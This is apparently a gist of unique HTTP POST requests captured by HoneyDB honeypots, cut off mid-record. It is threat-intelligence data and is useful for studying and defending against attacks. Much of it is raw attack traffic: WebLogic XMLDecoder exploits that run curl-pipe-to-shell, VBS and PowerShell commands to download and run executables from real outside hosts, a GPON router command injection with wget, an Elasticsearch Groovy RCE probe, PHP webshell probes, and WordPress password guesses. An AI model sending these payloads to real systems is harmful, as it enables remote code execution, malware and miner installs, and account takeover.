@foospidy
Created July 9, 2018 15:42
Unique POST requests collected from HoneyDB data
This file has been truncated, but you can view the full file.
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 408
Cache-Control: no-cache
Q/Rayd3IZhxBqzgkL0J7deIVkVpJ20LD8qxp2iY6wqlhb7uJMoBoekEb9ZFuseGv3J5TnIUnC7pDXGwIc/1LM7v/5BNrkt/rlfBG7gZ4m7O7CGW0DCGfqGVXT4c7ex/ZNqFhOM1WyXCI+nAcWTbrF95VC2y3XDi1VpsMdE06YNWnmYdB57kkO1ZFTa9uxMukUBALs0kybZEXot2gj8gGd2NnoFzMpfbX85JschPX0MBY1uJV1TdhBQKcQ6h+ZBAC7JVBKqUXtuBu+ZyiJZRk7+OB/kVcWeWKqzEaavg1C1dEg4+sfjWcvU2N2DcvbPsx9aF/qYjhYuJSQ8AeawsNCcvwwlJg1aQuG+hrAPX5qkTOLzmaNTeIVqPUvdDNitzOR+WUyDoOfskqy7Txzxlf9JZy
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1043
Content-Type: multipart/form-data; boundary=WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
895028
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
711ce935c81908a4f1c10d1623d47ff4
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2--
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache
log=172&pwd=172888
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÁ*4?Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îzûY›∆√«∆fl
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
axa=die('Hello, Peppa!');
POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
POST http://check.proxyradar.com/azenv.php?auth=149503078861&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 20
Cache-Control: no-cache
log=admin&pwd=aaaaaa
POST http://check.proxyradar.com/azenv.php?auth=149547882835&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 28
Cache-Control: no-cache
log=jamesatchue&pwd=99999999
POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 20
Cache-Control: no-cache
log=admin&pwd=171717
POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
h=die('Hello, Peppa!'.(string)(111111111*9));
POST http://check.proxyradar.com/azenv.php?auth=149604380857&a=PSCMN&i=2335900298&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache
log=172&pwd=monkey
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 436
Cache-Control: no-cache
SqNckt+eYZF7jH4xIPiStx+KsAmgALBzeeEKyXVpDXYERhZ4Tn/7gxAJAtuEdLnBGSraQCHmjktBuyNJU09rKJr0Whbgx0jJwDzFhjqoqezDe4NMY+egJmC5xZ6cW88zRTH2gmLxZ/uV2syHuBmx+qz1g317uBw6ASnBoJDz5+V4wc2nHwvHM/gPUw7m/GNZXFLWTX5y4+VGYKxgg53YwRVrRsKZBjbPymnI6fuMFRAgMO9FX1qY7VHjQEVjc3+rWzSq5SyDQisWCy7+nSxzbGkVGuXk8J9v9Sd8Q8bF9BufnmHfqV6jXQrF1QEQKqsD8isO1KkDOHFx4kXyig5/7wt9mSotStfrgvss/LIxjhx6m47dOtHf+6QQk7Mz8Heuz4aB2O7xmzwU/BrhYu4kMWyCcFVblP2H6SooiTCEchxcdGJ7Unw=
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÜôOÃÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÆ˛Y›∆√«∆fl
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 19
Cache-Control: no-cache
log=admin&pwd=test1
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å%ÑlhÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î¯+Y›∆√«∆fl
POST http://ssdk.adkmob.com/rp/ HTTP/1.1
Content-Length: 231
Content-Type: text/plain; charset=ISO-8859-1
Host: ssdk.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=17&ac=50&pos=32518&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":3003,"pkg":"com.mopub.banner","des":"","sug":-1}]
POST / HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Host: x.x.x.x
Content-Length: 0
Connection: close
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÁ*4?Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îzûY›∆√«∆fl
POST http://check.proxyradar.com/azenv.php?auth=149460066237&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
m=die((string)(111111111*9))
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
POST http://123.249.24.233/POST_ip_port.php HTTP/1.1
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache
&verifycode=&ip_port=162.252.243.126:8080
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å/ïÊ|Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞î&á.Y›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
m=die('Hello, Peppa!')
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 22
Cache-Control: no-cache
log=admin&pwd=17233333
POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅI™cÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÊöY›∆√«∆fl
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E [encoded command removed]</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1069
Content-Type: multipart/form-data; boundary=0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
329937
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
892970794664e96c8e660be7c39e7de0
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV--
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅI™cÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÊöY›∆√«∆fl
POST http://check.proxyradar.com/azenv.php?auth=149517555919&a=PSCMN&i=2335900298&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 360
Cache-Control: no-cache
Q6xWx9PNbPx9u2hkZlelWbTXjU4MR+FbF0PgF4FHjZMIe6RjjuTWvskIH6GhDtkvm+J/nOqMlwY2npO1Jw4nZP+rqI6lRuvq1HslIimZ+GzOVCpRITNT/ePfHAiTdF1cxFW1dO3RDkZ6zNHs8wsRa9K5GT0w8ioKO8yGEb23o4zBfnjx0zfTmvw6DyZ76bgRdk24gXRma2/L7lp6MmMOxK5bAtoWOQp/tdoorKUKxGQISPN/R4MohWzajOs6YzvbrzWgK1YX5F8EfwKKlz2XgiCWoMTM9VT+dcxcUzysi5cYZE4yagoOU4YNv72AZ6qFmTVE7k8GjxvAqgmvMYJzcpCDxy8llDDhRvuxG7U=
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Åa‰ÃÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞-Y›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; ASJB; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 392
Cache-Control: no-cache
BQi0xXwWBUGT77zzl7LXfYu0hFx18CGDGsU6vGrk9HkFAZ9e2Aa0j7iB6c+RnODsuh5q7UaiDS8blMr2DYnqEv/dBbVu52tVhPyg8XqgShGUteW7KbXtibEeUdeW4lJ17y0lpLV4tJVqbRwV3DyhPxk2FxeQfqCvp2LLwDNQ8RLuhPzh4KBxvKcUrKfqBV4JBa+ZMWIFqiG/DffTYrDfP7x0l3iKL3MJXh5xiU9AZROuhrqN+FulvH2pcvxcxsokL55kMndBW6Q6M07OA9+hGRJ35G9k6at6BhuopdoTakVOp6xh84lI9hKCQeOOzPTUlrUzwF1ZsUkQjal49REteqnl81k2mPvAcG0j6uWtiKXi3lRwF3gkvjlhJm233pN0Nd9Dsw==
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache
log=172&pwd=172zxc
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Ål»9≤Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÅ Y›∆√«∆fl
POST http://check.proxyradar.com/azenv.php?auth=149607147675&a=PSCMN&i=1082769120&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Ål÷yyÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îìD!Y›∆√«∆fl
POST http://behacdn.ksmobile.net/cfcl HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 38
&KÜWÍÕ`i'c
K6ÍoòKÌVcpjBhC*8kä^H
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å›Ño'Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÄ5-Y›∆√«∆fl
POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
leng=die('Hello, Peppa!'.(string)(111111111*9));
POST /_search?pretty HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
User-Agent: Java/1.8.0_31
Content-Length: 409
Host: x.x.x.x:9200
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; ASJB; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 368
Cache-Control: no-cache
AVO2mHJEUjgYaxHqdThnOStuWP76LambRhrvpB4+yi+YiIGCncx0mnB8gT3kPYMYwF8S3BN7TcBiBLaZvYSWBQElz1zDJd3M/vvZwoniP/iFmWBgCr+EoQlfy5YAAiAR3zQaoBLPmkrVefbg7SWVIUrWY/oWT5sq8O/zDsZ5RFa+7A88S3R4/BDcV08oUTwJQvHceuu92vNndG2wC1qfj+YYmwoG1XsfcWqtMimnj5OkhsUdRYAEN6AiHhksS7GzHkGvX4JROruEr7gvsq+xWVVDu20cguC4+NMsOfBZjNTKlFsX+T1fM++ZP0w8SiDB/IPsP5F88ZgiRT8E0onM5KTHo6tjlk9EvOVJdpilN94CRaI=
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å%ÑlhÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î¯+Y›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 850
Host: x.x.x.x:7001
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile('http://down.kingminer.club/downloader.exe','C:/Windows/temp/esentur.exe');start C:/Windows/temp/esentur.exe</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://check.proxyradar.com/azenv.php?auth=149594824019&a=PSCMN&i=1082769120&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
